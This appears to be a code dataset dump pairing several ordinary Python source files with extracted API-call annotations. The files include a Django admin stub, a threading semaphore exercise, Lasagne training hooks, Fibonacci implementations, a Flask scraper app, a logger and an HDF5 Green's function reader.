code
stringlengths 22
1.05M
| apis
listlengths 1
3.31k
| extract_api
stringlengths 75
3.25M
|
|---|---|---|
from django.contrib import admin
from .models import Dish
# Register your models here.
admin.site.register(Dish)
|
[
"django.contrib.admin.site.register"
] |
[((87, 112), 'django.contrib.admin.site.register', 'admin.site.register', (['Dish'], {}), '(Dish)\n', (106, 112), False, 'from django.contrib import admin\n')]
|
#!/usr/bin/python3
'''
############################################################################
->Autores:
-<NAME>
-<NAME>
->Fecha de creación: 01/11/2020
->Descripción: Análisis y resolución del problema 'Los alumnos y el asesor'
############################################################################
'''
import threading
import random
import time
def alumnos(id):
#Indica el número de preguntas que hará el alumno, puede ser de 1 a 10 preguntas
num_preguntas = random.randint(1, 10)
while num_preguntas > 0:
#El alumno intenta conseguir una silla
sillas.acquire()
print('---->El alumno %d consiguió silla' %id)
#El arreglo se usa para saber que alumnos ocupan sillas
alumnos_en_silla.append(id)
mutex_primer_alumno.acquire()
#En caso de ser el primer alumno en conseguir silla, despierta al profe
if len(alumnos_en_silla) == 1:
profe_dormido.release()
mutex_primer_alumno.release()
#Reduce el número de preguntas restantes del alumno
num_preguntas= num_preguntas - 1
print('-------->El alumno %d ya NO tiene dudas, ya se va' %id)
def profe():
while True:
#En caso de que haya alumnos ocupando sillas, resuelve duda
if len(alumnos_en_silla) > 0:
print('------>Resolviendo duda...')
time.sleep(random.random())
alumno_id = alumnos_en_silla.pop()
print('->Duda resuelta del alumno %d' %alumno_id)
sillas.release()
print('El alumno %d dejo la silla' %alumno_id)
#En caso contrario, se va a dormir
else:
print('->Profesor descansando')
profe_dormido.acquire()
print('->Profesor despierto')
#Máximo de alumnos
num_alumno = 10
#Máximo de sillas en el cubículo
num_sillas = 2
#Lista de alumnos sentados
alumnos_en_silla = []
#Creando semáforos
sillas = threading.Semaphore(num_sillas)
profe_dormido = threading.Semaphore(0)
mutex_primer_alumno = threading.Semaphore(1)
#Creando hilos
threading.Thread(target=profe).start()
for alumno_id in range(num_alumno):
threading.Thread(target=alumnos,args=[alumno_id]).start()
|
[
"threading.Thread",
"random.random",
"threading.Semaphore",
"random.randint"
] |
[((1942, 1973), 'threading.Semaphore', 'threading.Semaphore', (['num_sillas'], {}), '(num_sillas)\n', (1961, 1973), False, 'import threading\n'), ((1990, 2012), 'threading.Semaphore', 'threading.Semaphore', (['(0)'], {}), '(0)\n', (2009, 2012), False, 'import threading\n'), ((2035, 2057), 'threading.Semaphore', 'threading.Semaphore', (['(1)'], {}), '(1)\n', (2054, 2057), False, 'import threading\n'), ((493, 514), 'random.randint', 'random.randint', (['(1)', '(10)'], {}), '(1, 10)\n', (507, 514), False, 'import random\n'), ((2074, 2104), 'threading.Thread', 'threading.Thread', ([], {'target': 'profe'}), '(target=profe)\n', (2090, 2104), False, 'import threading\n'), ((2154, 2204), 'threading.Thread', 'threading.Thread', ([], {'target': 'alumnos', 'args': '[alumno_id]'}), '(target=alumnos, args=[alumno_id])\n', (2170, 2204), False, 'import threading\n'), ((1388, 1403), 'random.random', 'random.random', ([], {}), '()\n', (1401, 1403), False, 'import random\n')]
|
"""Defines hooks that can run during training."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import lasagne
import numpy as np
from sklearn import metrics
class LoggingHook(object):
"""This hook writes information to a log file."""
def __init__(self, logger):
"""Initializes a new instance of the LoggingHook class.
Args:
logger: A logger instance.
"""
self._logger = logger
def update(self, **kwargs):
"""Executes the hook.
Args:
**kwargs: Optimizer state dictionary.
"""
self._logger.log(
key="status",
message="Log at iteration %d" % kwargs["update_counter"]
)
self._logger.log(
key="update_counter",
message=kwargs["update_counter"]
)
self._logger.log(
key="update_runtime",
message=kwargs["runtime"]
)
self._logger.log(
key="losses",
message=np.asarray(kwargs["losses"])
)
class SnapshotHook(object):
"""Hook for storing snapshots of the network's weights."""
def __init__(self, filename, network, interval):
"""Initializes a new instance of the SnapshotHook class.
Args:
filename: The base filename of the model.
network: The network instance to store.
interval: The snapshot interval.
"""
self._filename = filename
self._network = network
self._interval = interval
def update(self, **kwargs):
"""Executed the hook.
Args:
**kwargs: The optimizer dictionary.
"""
# Run the hook now?
if kwargs["update_counter"] % self._interval == 0:
# Yes
np.savez(
"%s_snapshot_%d.npz" % (
self._filename, kwargs["update_counter"]),
*lasagne.layers.get_all_param_values(self._network))
class SegmentationValidationHook(object):
"""Performs a validation run for semantic segmentation."""
def __init__(self, val_fn, data_provider, logger, interval=300,
num_classes=19):
"""Initializes a new instance of the SegmentationValidationHook class.
Args:
val_fn: A function that returns the predictions for each image and
a list of losses.
data_provider: A chianti data provider.
logger: A logger instance.
interval: The validation interval.
"""
self._val_fn = val_fn
self._data_provider = data_provider
self._logger = logger
self._interval = interval
self._num_classes = num_classes
def update(self, **kwargs):
"""Runs the validation hook."""
update_now = kwargs["update_counter"] % self._interval == 0
if update_now and kwargs["update_counter"] > 0:
self._logger.log(
key="validation_checkpoint",
message=kwargs["update_counter"]
)
self._logger.log(
key="status",
message="-> Start validation run"
)
# Initialize the confusion matrix
conf_matrix = np.zeros(
(self._num_classes, self._num_classes)).astype('int64')
accumulated_loss = 0
self._data_provider.reset()
for batch_counter in range(self._data_provider.get_num_batches()):
self._logger.log(
key="status",
message="--> Validate batch %d/%d" % (
batch_counter + 1,
self._data_provider.get_num_batches()))
batch = self._data_provider.next()
images = batch[0]
targets = batch[1]
predictions, loss = self._val_fn(images, targets)
accumulated_loss += loss
# Mark the don't care predictions
# Flatten the predictions and targets
flat_predictions = predictions.flatten()
non_void_pixels = (np.max(targets, axis=1) != 0.0).flatten()
flat_targets = np.argmax(targets, axis=1).flatten()
# Select the non-don't cares
flat_targets = flat_targets[non_void_pixels]
flat_predictions = flat_predictions[non_void_pixels]
conf_matrix += metrics.confusion_matrix(
flat_targets,
flat_predictions,
labels=np.arange(self._num_classes, dtype='int64'))
accumulated_loss /= self._data_provider.get_num_batches()
self._logger.log(
key="conf_matrix",
message=conf_matrix
)
self._logger.log(
key="validation_loss",
message=accumulated_loss
)
|
[
"lasagne.layers.get_all_param_values",
"numpy.argmax",
"numpy.asarray",
"numpy.zeros",
"numpy.max",
"numpy.arange"
] |
[((1068, 1096), 'numpy.asarray', 'np.asarray', (["kwargs['losses']"], {}), "(kwargs['losses'])\n", (1078, 1096), True, 'import numpy as np\n'), ((1983, 2033), 'lasagne.layers.get_all_param_values', 'lasagne.layers.get_all_param_values', (['self._network'], {}), '(self._network)\n', (2018, 2033), False, 'import lasagne\n'), ((3309, 3357), 'numpy.zeros', 'np.zeros', (['(self._num_classes, self._num_classes)'], {}), '((self._num_classes, self._num_classes))\n', (3317, 3357), True, 'import numpy as np\n'), ((4278, 4304), 'numpy.argmax', 'np.argmax', (['targets'], {'axis': '(1)'}), '(targets, axis=1)\n', (4287, 4304), True, 'import numpy as np\n'), ((4648, 4691), 'numpy.arange', 'np.arange', (['self._num_classes'], {'dtype': '"""int64"""'}), "(self._num_classes, dtype='int64')\n", (4657, 4691), True, 'import numpy as np\n'), ((4205, 4228), 'numpy.max', 'np.max', (['targets'], {'axis': '(1)'}), '(targets, axis=1)\n', (4211, 4228), True, 'import numpy as np\n')]
|
# Implementations done in Python since it natively supports unbounded integer
# arithmetic and fractional math
#Compiled with Python 2.7.3 (default, Apr 10 2012, 23:31:26) [MSC v.1500 32 bit (Intel)] on win32
#in IDLE version 2.7.3
#For profiling (written in C to avoid overhead)
import cProfile
# to deal with fractions
from fractions import Fraction
global called
global countAdd
global countSub
global countMult
called = 0
countAdd = 0
countSub = 0
countMult = 0
#Recursive implementation based on text
def fibonacci(n, count = False):
global called
global countAdd
global countSub
global countMult
if count == True:
called += 1
if n<=2:
return 1
else:
if count == True:
countAdd += 1
countSub += 2
return fibonacci(n-1, count)+fibonacci(n-2, count)
'''
For n = 10:
Counts 54 additions vs 52 predicted (not sure why?)
Counts 108 Subtractions vs 104 predicted (not sure why?)
109 Calls implying 55 calls of cost zero
Implementation is Robust (no possibility of rounding error)
& unbounded integer arithmetic in python
Implementation is very slow for n > 60 (because of the
many duplicated recursive calls, as shown in the trie
from Q4); with count = True it is slow for n > 40)
It will also fail completely because of the limit
on recursion (of course, any implementation will
eventually unless storage can grow faster than required
memory)
'''
#Loop implementation (differs slightly from design to be more storage efficient)
def fibLoop(n, count = False):
global called
global countAdd
global countSub
global countMult
fib1 = 1
fib2 = 1
for i in range(2,n):
if count == True:
countAdd += 1
newfib = fib1 + fib2
fib1 = fib2
fib2 = newfib
return fib2
'''
For n = 10:
Counts 8 additions, as predicted
Counts 0 Subtractions vs 16 predicted, since we didn't use
a list, but it performs additional 16 assignments instead
Implementation is Robust (no possibility of rounding error)
& unbounded integer arithmetic in python
n = 100,000 --> 0.166 seconds
n = 1,000,000 --> 14.028 seconds
'''
#Direct implementation subject to rounding errors for n > 71
def fibDirect(n, count = False):
global called
global countAdd
global countSub
global countMult
rFive = (5**0.5)
if count == True:
countMult += 2*(n-1) + 2 #uses Naive assumption for how
countSub += 2 # power function works
countAdd += 1
c = 1/rFive
a = ((1+rFive)/2)**n
b = ((1-rFive)/2)**n
return int(c*(a-b))
'''
For n = 10:
Counts 1 addition, as predicted
Counts 2 Subtractions as predicted
Counts 20 Multiplications as predicted (but this is based on a
Naive assumption of how exponentiation is implemented
Implementation is NOT Robust; we start getting rounding error
at n = 72
Since it is not robust, and the results we are interested in are
exact integers, it isn't really relevent when it fails (i.e
it is unreliable for n > 71)
Maybe if we were interested in ratios, we could still use it
(but why bother since there are better methods?)
Fails for n > 1475 --> Overflow
Python only supports unbounded *integer* arithmetic :)
'''
# Robust Direct implementation (uses helper functions below)
def betterFibDirect(n, count = False):
global called
global countAdd
global countSub
global countMult
if count == True:
countSub += 1
a = rFivePow((Fraction(1,2),Fraction(1,2)),n, count)
b = rFivePow((Fraction(1,2),Fraction(-1,2)),n, count)
return int(a[1]-b[1])
'''
For n = 10:
Counts 36 additions (no prediction)
Counts 1 Subtraction (no prediction)
Counts 90 Multiplications (no prediction) - based on Naive expmentiation
but these are fractional multiplications
Implementation is Robust! Since there no possibility of rounding error
because we are dealing with only integers (and fractions)
n = 100,000 --> 69.411 seconds
n = 1,000,000 --> > 20 minutes
This is as far as I'm willing to go with this one, but I don't think
it will actually fail until we run out of memory, but it does get slower
and slower because of the multiplication of large numbers
Also: see NOTE after the next function
'''
# Robust Direct implementation (uses helper functions below)
# cuts our multiplications and additions in two
# I forgot to do this in the first implementation: D'Oh!
def muchBetterFibDirect(n, count = False):
global called
global countAdd
global countSub
global countMult
if count == True:
countSub += 1
a = rFivePow((Fraction(1,2),Fraction(1,2)),n, count)
b = a[0],-a[1] ## Altered Line
return int(a[1]-b[1])
'''
For n = 10:
Counts 18 additions as predicted
Counts 1 Subtraction as before
Counts 45 Multiplications as predicted
but these are fractional multiplications
Implementation is Robust! Since there is no possibility of rounding
error because we are dealing with only integers (and fractions)
n = 100,000 --> 37.039 seconds
NOTE: We should be able to make this implementation much better
by implementing exponentiation in a smarter way, but it will
probably only compete with fibLoop if we implement a table
to look up our exponents, in which case we might as well store
the fibonacci numbers themselves... unless we want to compute
other fibonacci-like sequences easily...
'''
# A better recursive implementation that avoids duplication of labour
def betterFibonacci(n, count = False):
global called
global countAdd
global countSub
global countMult
if count == True:
called += 1
if n<=2:
return (1,1)
else:
if count == True:
countAdd += 1
countSub += 1
pair = betterFibonacci(n-1, count)
return (pair[1],pair[0]+pair[1])
'''
For n = 10:
Counts 8 additions, as expected (see the graph in Q4)
Counts 8 Subtractions, as expected
9 calls as expected (vs 109 for the Naive implementation)
Implementation is Robust, since there no possibility of rounding error
Fails for n > 991 --> Maximum Recursion depth exceeded
This is a python consideration to protect from catasrophic
failure (likely our Naive implementation would also fail here
if not a little earlier, but I don't have time to wait for that)
'''
###########################################################
# HELPER FUNCTIONS #
###########################################################
# Exact multiplication for numbers of the form x+y*sqrt(5)
def rFiveMult(n,m, count = False):
global called
global countAdd
global countSub
global countMult
if count == True:
countMult += 5
countAdd += 2
return (m[0]*n[0]+m[1]*n[1]*5,m[0]*n[1]+m[1]*n[0])
# Naive power function for numbers of the form x+y*sqrt(5)
def rFivePow(x,n, count = False):
global called
global countAdd
global countSub
global countMult
result = x
for i in range(1,n):
result = rFiveMult(x,result, count)
return result
# Reset the global counters
def resetCount():
global called
global countAdd
global countSub
global countMult
called = 0
countAdd = 0
countSub = 0
countMult = 0
def printResults(n):
global called
global countAdd
global countSub
global countMult
print(n)
print ("\n")
print("Additions: " + str(countAdd))
print("Subtractions: " + str(countSub))
print ("Multiplications: " + str(countMult))
print ("Calls: " + str(called))
resetCount()
if __name__ == "__main__":
done = False
while not done:
resetCount()
n = input("Enter a non-negative integer: ")
print ("\n")
#''' Remove # before and after blocks to comment out
print("fibonacci("+str(n) + ") = ")
printResults(fibonacci(n, True))
cProfile.run('fibonacci(n)')
#'''
#'''
print("fibLoop("+str(n) + ") = ")
printResults(fibLoop(n, True))
cProfile.run('fibLoop(n)')
#'''
#'''
print("fibDirect("+str(n) + ") = ")
printResults(fibDirect(n, True))
cProfile.run('fibDirect(n)')
#'''
''' # replaced with muchBetterFibDirect
print("betterFibDirect("+str(n) + ") = ")
printResults(betterFibDirect(n, True))
cProfile.run('betterFibDirect(n)')
'''
#'''
print("muchBetterFibDirect("+str(n) + ") = ")
printResults(muchBetterFibDirect(n, True))
cProfile.run('muchBetterFibDirect(n)')
#'''
#'''
print("betterFibonacci("+str(n) + ") = ")
printResults(betterFibonacci(n, True)[1])
cProfile.run('betterFibonacci(n)')
#'''
print ("\n")
s = raw_input("Exit? Y/N ").lower()
if s == 'y':
done = True
|
[
"fractions.Fraction",
"cProfile.run"
] |
[((8040, 8068), 'cProfile.run', 'cProfile.run', (['"""fibonacci(n)"""'], {}), "('fibonacci(n)')\n", (8052, 8068), False, 'import cProfile\n'), ((8185, 8211), 'cProfile.run', 'cProfile.run', (['"""fibLoop(n)"""'], {}), "('fibLoop(n)')\n", (8197, 8211), False, 'import cProfile\n'), ((8340, 8368), 'cProfile.run', 'cProfile.run', (['"""fibDirect(n)"""'], {}), "('fibDirect(n)')\n", (8352, 8368), False, 'import cProfile\n'), ((8718, 8756), 'cProfile.run', 'cProfile.run', (['"""muchBetterFibDirect(n)"""'], {}), "('muchBetterFibDirect(n)')\n", (8730, 8756), False, 'import cProfile\n'), ((8892, 8926), 'cProfile.run', 'cProfile.run', (['"""betterFibonacci(n)"""'], {}), "('betterFibonacci(n)')\n", (8904, 8926), False, 'import cProfile\n'), ((3554, 3568), 'fractions.Fraction', 'Fraction', (['(1)', '(2)'], {}), '(1, 2)\n', (3562, 3568), False, 'from fractions import Fraction\n'), ((3568, 3582), 'fractions.Fraction', 'Fraction', (['(1)', '(2)'], {}), '(1, 2)\n', (3576, 3582), False, 'from fractions import Fraction\n'), ((3611, 3625), 'fractions.Fraction', 'Fraction', (['(1)', '(2)'], {}), '(1, 2)\n', (3619, 3625), False, 'from fractions import Fraction\n'), ((3625, 3640), 'fractions.Fraction', 'Fraction', (['(-1)', '(2)'], {}), '(-1, 2)\n', (3633, 3640), False, 'from fractions import Fraction\n'), ((4693, 4707), 'fractions.Fraction', 'Fraction', (['(1)', '(2)'], {}), '(1, 2)\n', (4701, 4707), False, 'from fractions import Fraction\n'), ((4707, 4721), 'fractions.Fraction', 'Fraction', (['(1)', '(2)'], {}), '(1, 2)\n', (4715, 4721), False, 'from fractions import Fraction\n')]
|
#Get dependencies
from flask import Flask, render_template, redirect
import pymongo
import mission_to_mars
import jinja2
from jinja2 import TemplateNotFound
#Create Flask App
app = Flask(__name__)
#Connect to MongoDB
conn = "mongodb://localhost:27017"
client = pymongo.MongoClient(conn)
db = client.mars_DB
@app.route("/")
def index():
mars = db.mars_data.find_one()
return render_template("index.html", mars=mars)
@app.route("/scrape")
def scrape():
mars_data = mission_to_mars.scrape()
db.mars_data.update(
{},
mars_data,
upsert=True
)
return redirect("http://localhost:5000/", code=302)
if __name__ == "__main__":
app.run(debug=True)
|
[
"pymongo.MongoClient",
"mission_to_mars.scrape",
"flask.redirect",
"flask.Flask",
"flask.render_template"
] |
[((189, 204), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (194, 204), False, 'from flask import Flask, render_template, redirect\n'), ((274, 299), 'pymongo.MongoClient', 'pymongo.MongoClient', (['conn'], {}), '(conn)\n', (293, 299), False, 'import pymongo\n'), ((402, 442), 'flask.render_template', 'render_template', (['"""index.html"""'], {'mars': 'mars'}), "('index.html', mars=mars)\n", (417, 442), False, 'from flask import Flask, render_template, redirect\n'), ((500, 524), 'mission_to_mars.scrape', 'mission_to_mars.scrape', ([], {}), '()\n', (522, 524), False, 'import mission_to_mars\n'), ((624, 668), 'flask.redirect', 'redirect', (['"""http://localhost:5000/"""'], {'code': '(302)'}), "('http://localhost:5000/', code=302)\n", (632, 668), False, 'from flask import Flask, render_template, redirect\n')]
|
# -*- coding: utf-8 -*-
"""
xobox.cli.logger
~~~~~~~~~~~~~~~~
:copyright: Copyright 2017 by the Stormrose Project team, see AUTHORS.
:license: MIT License, see LICENSE for details.
"""
import sys
from datetime import datetime
from ..conf import get_conf
from ..utils.singleton import Singleton
from ..utils import termcolor
from ..utils.timer import counter
Levels = {
'mute': (0, '', ''),
'error': (1, 'ERROR', 'LOG_ERR'),
'warning': (2, 'WARN ', 'LOG_WARNING'),
'notice': (3, 'NOTE ', 'LOG_NOTICE'),
'info': (4, 'INFO ', 'LOG_INFO'),
'debug': (5, 'DEBUG', 'LOG_DEBUG')
}
@Singleton
class Logger(object):
"""
Class providing the output interface for various output channels. Currently,
supported output channels are
* the terminal (stdout and stderr)
* files accessible through the local file system
.. note::
Please note that the :py:class:`~xobox.cli.logger.Logger` class is a
decorated singleton, which means instances cannot be retrieved directly,
but must be obtained using the :py:meth:`~xobox.cli.logger.Logger.get_instance`
method.
The following key word arguments are understood:
:param str type: Type of this logger. Must be one of `file` or `term`.
:param str level: Minimum level for logging. Must be one of `mute`, `error`, `warning`, `info` or `debug`.
:param str file: Path of the log file to log into if type is set to `file`.
:param bool color: Allow colored logging (only effective if type is set to `term`)
"""
def __init__(self, *args, **kwargs):
self._levels = Levels
self._level = get_conf('DEFAULT_LOG_LEVEL')
self._type = get_conf('DEFAULT_LOG_TYPE')
self._logfile = get_conf('DEFAULT_LOG_FILE')
self._queue = None
self._init_queue()
self._fp_std = None
self._fp_err = None
color_candidate = get_conf('DEFAULT_LOG_COLOR')
# Check for positional arguments
if len(args) > 0 and args[0] in ('file', 'term'):
self._type = args[0]
if len(args) > 1 and args[1] in self._levels:
self._level = args[1]
if len(args) > 2 and type(args[2]) == str:
self._logfile = args[2]
if len(args) > 3 and type(args[3]) == bool:
color_candidate = args[3]
# Check for keyword arguments
if 'type' in kwargs and kwargs['type'] in ('file', 'term'):
self._type = kwargs['type']
if 'level' in kwargs and kwargs['level'] in self._levels:
self._level = kwargs['level']
if 'file' in kwargs:
self._logfile = kwargs['file']
if 'color' in kwargs and type(kwargs['color']) == bool:
color_candidate = kwargs['color']
# finally decide about color support and open the log channel
if termcolor.supports_color() and self._type == 'term':
self._color = color_candidate
else:
self._color = False
self._open()
def _open(self):
"""Open the log channel"""
if self._type == 'term':
self._fp_std = sys.stdout
self._fp_err = sys.stderr
elif self._type == 'file':
# enforce lazy behaviour
self._fp_std = None
self._fp_err = None
def _close(self):
"""Close the current log channel"""
if self._type == 'term':
self._fp_std = None
self._fp_err = None
elif self._type == 'file':
self._fp_std.close()
self._fp_err = None
def _init_queue(self):
"""Initialise message queue"""
self._queue = {
'std': {},
'err': {}
}
def _flush(self):
"""Flush log queue to the log channel"""
if self._type == 'term':
self._flush_term()
elif self._type == 'file':
self._flush_file()
self._init_queue()
def _flush_term(self):
"""Flush implementation for terminal logging"""
self._flush_term_err(self._queue['err'])
self._flush_term_std(self._queue['std'])
def _flush_term_std(self, queue):
"""Flushes the stdout message queue on a terminal"""
for msg in sorted(queue.keys()):
print(queue[msg][1], file=self._fp_std)
def _flush_term_err(self, queue):
"""Flushes the stderr message queue on a terminal"""
for msg in sorted(queue.keys()):
print(queue[msg][1], file=self._fp_err)
def _flush_file(self):
"""Flush implementation for file logging (lazy)"""
if not self._fp_std:
self._fp_std = open(self._logfile, encoding=get_conf('DEFAULT_CHARSET'), mode='a+')
padding = len("[{}] [ ]".format(datetime.now().strftime(get_conf('DEFAULT_LOG_TIMESTAMP')))) * " "
queue = dict(self._queue['err'])
queue.update(self._queue['std'])
for msg in sorted(queue.keys()):
# noinspection PyTypeChecker
msg_lines = queue[msg][1].splitlines()
# noinspection PyTypeChecker
print(
"[{date}] [{level}] {message}".format(
date=datetime.now().strftime(get_conf('DEFAULT_LOG_TIMESTAMP')),
level=self._levels[queue[msg][0]][1],
message=msg_lines[0]
),
file=self._fp_std
)
for msg_line in msg_lines[1:]:
# noinspection PyTypeChecker
print("{padding} {message}".format(padding=padding, message=msg_line), file=self._fp_std)
def log(self, level, message):
"""Register a log message within the logging queue"""
# log usage messages only on a terminal
if level == 'usage':
if self._type == 'term':
self._queue['err'][counter()] = (level, message)
# otherwise, log messages if their level is appropriate
if level in self._levels and self._levels[self._level][0] >= self._levels[level][0]:
if level == 'error':
self._queue['err'][counter()] = (level, message)
else:
self._queue['std'][counter()] = (level, message)
self._flush()
def log_error(self, message):
"""Convenience shortcut for registering messages with log level `error`"""
self.log('error', message)
def log_warning(self, message):
"""Convenience shortcut for registering messages with log level `warning`"""
self.log('warning', message)
def log_notice(self, message):
"""Convenience shortcut for registering messages with log level `notice`"""
self.log('notice', message)
def log_info(self, message):
"""Convenience shortcut for registering messages with log level `info`"""
self.log('info', message)
def log_debug(self, message):
"""Convenience shortcut for registering messages with log level `debug`"""
self.log('debug', message)
def log_usage(self, message):
"""Convenience shortcut for registering messages with log level `usage`"""
self.log('usage', message)
@property
def color(self):
"""
Boolean switch indicating whether this logger allows colored output.
"""
return self._color
@color.setter
def color(self, value):
if termcolor.supports_color() and self._type == 'term' and type(value) == bool:
self._color = value
@property
def file(self):
"""
The log file used when run as file logger.
"""
return self._logfile
@file.setter
def file(self, value):
self._logfile = value
if self._type == 'file':
self._close()
self._open()
@property
def level(self):
"""
The log level. Expected to be one of `mute`, `error`, `warning`, `info` or `debug`.
"""
return self._level
@level.setter
def level(self, value):
if value in self._levels:
self._level = value
@property
def type(self):
"""
The logger type. Expected to be one of `term` or `file`.
"""
return self._type
@type.setter
def type(self, value):
if value in ('file', 'term'):
self._close()
self._type = value
self._open()
if value == 'file':
self._color = False
|
[
"datetime.datetime.now"
] |
[((4827, 4841), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (4839, 4841), False, 'from datetime import datetime\n'), ((5249, 5263), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (5261, 5263), False, 'from datetime import datetime\n')]
|
# -*- coding: utf-8 -*-
###############################################################################
# Copyright (c), Forschungszentrum Jülich GmbH, IAS-1/PGI-1, Germany. #
# All rights reserved. #
# This file is part of the Masci-tools package. #
# (Material science tools) #
# #
# The code is hosted on GitHub at https://github.com/judftteam/masci-tools. #
# For further information on the license, see the LICENSE.txt file. #
# For further information please visit http://judft.de/. #
# #
###############################################################################
"""
This module contains utility and functions to work with Green's functions calculated
and written to ``greensf.hdf`` files by fleur
"""
from collections import namedtuple
from itertools import groupby
import numpy as np
import h5py
from masci_tools.io.parsers.hdf5 import HDF5Reader
from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation
from masci_tools.util.constants import HTR_TO_EV
GreensfElement = namedtuple('GreensfElement',
['l', 'lp', 'atomType', 'atomTypep', 'sphavg', 'onsite', 'contour', 'nLO', 'atomDiff'])
def _get_sphavg_recipe(group_name, index, contour):
"""
Get the HDF5Reader recipe for reading in a spherically averaged Green's function element
:param group_name: str of the group containing the Green's function elements
:param index: integer index of the element to read in (indexing starts at 1)
:param contour: integer index of the energy contour to read in (indexing starts at 1)
:returns: dict with the recipe reading all the necessary information from the ``greensf.hdf`` file
"""
return {
'datasets': {
'sphavg': {
'h5path':
f'/{group_name}/element-{index}/sphavg',
'transforms': [
Transformation(name='convert_to_complex_array', args=(), kwargs={}),
Transformation(name='multiply_scalar', args=(1.0 / HTR_TO_EV,), kwargs={})
]
},
'energy_points': {
'h5path':
f'/EnergyContours/contour-{contour}/ContourPoints',
'transforms': [
Transformation(name='convert_to_complex_array', args=(), kwargs={}),
AttribTransformation(name='shift_by_attribute',
attrib_name='fermi_energy',
args=(),
kwargs={
'negative': True,
}),
Transformation(name='multiply_scalar', args=(HTR_TO_EV,), kwargs={})
]
},
'energy_weights': {
'h5path':
f'/EnergyContours/contour-{contour}/IntegrationWeights',
'transforms': [
Transformation(name='convert_to_complex_array', args=(), kwargs={}),
Transformation(name='multiply_scalar', args=(HTR_TO_EV,), kwargs={})
]
}
},
'attributes': {
'fermi_energy': {
'h5path':
'/general',
'description':
'fermi_energy of the system',
'transforms': [
Transformation(name='get_attribute', args=('FermiEnergy',), kwargs={}),
Transformation(name='get_first_element', args=(), kwargs={})
]
},
'spins': {
'h5path':
'/general',
'description':
'number of spins',
'transforms': [
Transformation(name='get_attribute', args=('spins',), kwargs={}),
Transformation(name='get_first_element', args=(), kwargs={})
]
},
'mperp': {
'h5path':
'/general',
'description':
'Switch whether spin offdiagonal elements are included',
'transforms': [
Transformation(name='get_attribute', args=('mperp',), kwargs={}),
Transformation(name='get_first_element', args=(), kwargs={}),
Transformation(name='apply_lambda', args=(lambda x: x == 1,), kwargs={})
]
},
'lmax': {
'h5path':
f'/{group_name}',
'description':
'Maximum l considered (Determines size of the matrix)',
'transforms': [
Transformation(name='get_attribute', args=('maxl',), kwargs={}),
Transformation(name='get_first_element', args=(), kwargs={})
]
},
}
}
def _get_radial_recipe(group_name, index, contour):
"""
Get the HDF5Reader recipe for reading in a radial Green's function element
:param group_name: str of the group containing the Green's function elements
:param index: integer index of the element to read in (indexing starts at 1)
:param contour: integer index of the energy contour to read in (indexing starts at 1)
:returns: dict with the recipe reading all the necessary information from the ``greensf.hdf`` file
"""
recipe = _get_sphavg_recipe(group_name, index, contour)
recipe['datasets'].pop('sphavg')
recipe['datasets']['coefficients'] = {
'h5path':
f'/{group_name}/element-{index}',
'transforms': [
Transformation(name='get_all_child_datasets',
args=(),
kwargs={'ignore': ['scalarProducts', 'LOContribution']}),
Transformation(name='convert_to_complex_array', args=(), kwargs={}),
Transformation(name='multiply_scalar', args=(1.0 / HTR_TO_EV,), kwargs={})
],
'unpack_dict':
True
}
recipe['attributes']['scalarProducts'] = {
'h5path': f'/{group_name}/element-{index}/scalarProducts',
'transforms': [Transformation(name='get_all_child_datasets', args=(), kwargs={})]
}
recipe['attributes']['radialFunctions'] = {
'h5path': '/RadialFunctions',
'transforms': [Transformation(name='get_all_child_datasets', args=(), kwargs={})]
}
return recipe
def _get_greensf_group_name(hdffile):
"""
Return the name of the group containing the Green's function elements
:param hdffile: h5py.File of the greensf.hdf file
:returns: str of the group name containing the Green's Function elements
"""
if '/GreensFunctionElements' in hdffile:
return 'GreensFunctionElements'
elif '/Hubbard1Elements' in hdffile:
return 'Hubbard1Elements'
def _read_element_header(hdffile, index):
"""
Read the attributes of the given green's function elements
:param hdffile: h5py.File of the greensf.hdf file
:param index: integer index of the element to read in (indexing starts at 1)
:returns: :py:class:`GreensfElement` corresponding to the read in attributes
"""
group_name = _get_greensf_group_name(hdffile)
element = hdffile.get(f'/{group_name}/element-{index}')
l = element.attrs['l'][0]
lp = element.attrs['lp'][0]
atomType = element.attrs['atomType'][0]
atomTypep = element.attrs['atomTypep'][0]
sphavg = element.attrs['l_sphavg'][0] == 1
onsite = element.attrs['l_onsite'][0] == 1
contour = element.attrs['iContour'][0]
atomDiff = np.array(element.attrs['atomDiff'])
atomDiff[abs(atomDiff) < 1e-12] = 0.0
nLO = element.attrs['numLOs'][0]
return GreensfElement(l, lp, atomType, atomTypep, sphavg, onsite, contour, nLO, atomDiff)
def _read_gf_element(file, index):
"""
Read the information needed for a given Green's function element form a ``greensf.hdf``
file
:param file: filepath or handle to be read
:param index: integer index of the element to read in (indexing starts at 1)
:returns: tuple of the information containing the :py:class:`GreensfElement` for the element
and the datasets and attributes dict produced by the corresponding
:py:class:`~masci_tools.io.parsers.hdf5.HDF5Reader`
"""
with HDF5Reader(file) as h5reader:
gf_element = _read_element_header(h5reader._h5_file, index)
group_name = _get_greensf_group_name(h5reader._h5_file)
if gf_element.sphavg:
recipe = _get_sphavg_recipe(group_name, index, gf_element.contour)
else:
recipe = _get_radial_recipe(group_name, index, gf_element.contour, nlo=gf_element.nLO)
data, attributes = h5reader.read(recipe=recipe)
return gf_element, data, attributes
class GreensFunction:
"""
Class for working with Green's functions calculated by the fleur code
:param element: :py:class:`GreensfElement` namedtuple containing the information about the element
:param data: datasets dict produced by one of the hdf recipes for reading Green's functions
:param attributes: attributes dict produced by one of the hdf recipes for reading Green's functions
"""
def __init__(self, element, data, attributes):
self.element = element
self.points = data.pop('energy_points')
self.weights = data.pop('energy_weights')
self.data = data
if not self.sphavg:
self.scalar_products = attributes['scalarProducts']
self.radial_functions = attributes['radialFunctions']
raise NotImplementedError("Radial Green's functions not yet implemented")
self.spins = attributes['spins']
self.mperp = attributes['mperp']
self.lmax = attributes['lmax']
@classmethod
def fromFile(cls, file, index):
"""
Classmethod for creating a :py:class:`GreensFunction` instance directly from a hdf file
:param file: path or opened file handle to a greensf.hdf file
:param index: int index of the element to read in
"""
element, data, attributes = _read_gf_element(file, index)
return cls(element, data, attributes)
def __getattr__(self, attr):
"""
This __getattr__ method redirects lookups of field names of the stored :py:class:`GreensfElement`
to return the value from the namedtuple
:param attr: attribute to look up
:returns: value of the attribute if it is a field name of :py:class:`GreensfElement`
"""
